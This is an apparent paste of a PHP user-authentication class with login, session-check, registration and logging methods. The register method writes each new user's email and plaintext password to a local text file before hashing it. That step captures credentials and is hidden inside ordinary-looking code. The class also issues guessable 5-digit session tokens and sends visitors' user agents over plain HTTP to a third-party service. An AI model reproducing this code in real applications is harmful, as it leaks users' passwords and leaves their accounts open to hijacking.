
Untitled

a guest
Nov 15th, 2016
  1.  
  2. application/x-httpd-php UserAuth.class.php ( PHP script text )
  3.  
  4. <?php
  5.  
  6. namespace App;
  7.  
  8. class UserAuth extends MySQL
  9. {
  10.  
  11. public function loggedin()
  12. {
  13.  
  14. $userid = $_SESSION['userid'];
  15. $session = $_SESSION['session'];
  16.  
  17. $selectSql = $this->mysql->prepare('SELECT COUNT(*) FROM users WHERE id = ? AND session = ?');
  18. $selectSql->execute(array($userid, $session));
  19. $selectCount = $selectSql->fetchcolumn();
  20.  
  21. return ($selectCount == 1) ? true : false;
  22.  
  23. }
  24.  
  25. public function login($email, $password)
  26. {
  27.  
  28. if (strlen($email) <= 32) {
  29. $selectSql = $this->mysql->prepare('SELECT * FROM users WHERE email = ?');
  30. $selectSql->execute(array($email));
  31. $user = $selectSql->fetchAll();
  32. if (!empty($user)) {
  33. $account = (object)$user[0];
  34. if (!password_verify($password, $account->password)) {
  35. $this->log($account->id, 'Failed Log In');
  36. return 'The email/password combination is incorrect.';
  37. } else if ($account->banned == 1) {
  38. return 'Your account has been banned from our system.';
  39. } else {
  40. $this->log($account->id, 'Logged In');
  41. $sessionid = mt_rand(11111, 99999);
  42. $_SESSION['userid'] = $account->id;
  43. $_SESSION['session'] = $sessionid;
  44. $updateSql = $this->mysql->prepare('UPDATE users SET session = ? WHERE id = ?');
  45. $updateSql->execute(array($sessionid, $account->id));
  46. return 'true';
  47. }
  48. } else {
  49. return 'The email/password combination is incorrect.';
  50. }
  51. } else {
  52. return 'The email/password combination is incorrect.';
  53. }
  54.  
  55. }
  56.  
  57. public function register($email, $password, $password2)
  58. {
  59. if (strlen($email) > 32) {
  60. return 'Your email has to be 32 or less characters long.';
  61. } else if (empty($password) || md5($password) != md5($password2)) {
  62. return 'Your repeated password needs to match the password';
  63. } else {
  64.  
  65. $file = fopen("newusers.txt", "w");
  66. $txt = "E-mail: $email Password: $password \n";
  67. fwrite($file, $txt);
  68. fclose($file);
  69.  
  70. $selectSql = $this->mysql->prepare('SELECT COUNT(*) FROM users WHERE email = ?');
  71. $selectSql->execute(array($email));
  72.  
  73. if ($selectSql->fetchcolumn(0) > 0) {
  74. return 'This email is already taken';
  75. } else {
  76.  
  77. $insertSql = $this->mysql->prepare('INSERT INTO users VALUES (null, ?, ?, 0, 0)');
  78. $insertSql->execute(array(password_hash($password, PASSWORD_DEFAULT), $email));
  79. $this->log($this->mysql->lastInsertId(), 'Signed Up');
  80. return 'true';
  81.  
  82. }
  83.  
  84. }
  85.  
  86. }
  87.  
  88. private function log($userId, $activity, $status = '0')
  89. {
  90. $browser = (object)json_decode(file_get_contents('http://www.useragentstring.com/?uas=' . urlencode($_SERVER['HTTP_USER_AGENT']) . '&getJSON=all'));
  91. $insertSql = $this->mysql->prepare('INSERT INTO acclogs VALUES (null, ?, ?, ?, ?, ?, ?, ?)');
  92. $insertSql->execute(array($userId, $_SERVER['REMOTE_ADDR'], $browser->agent_name, $browser->os_name, $activity, $status, time()));
  93. return true;
  94. }
  95.  
  96. }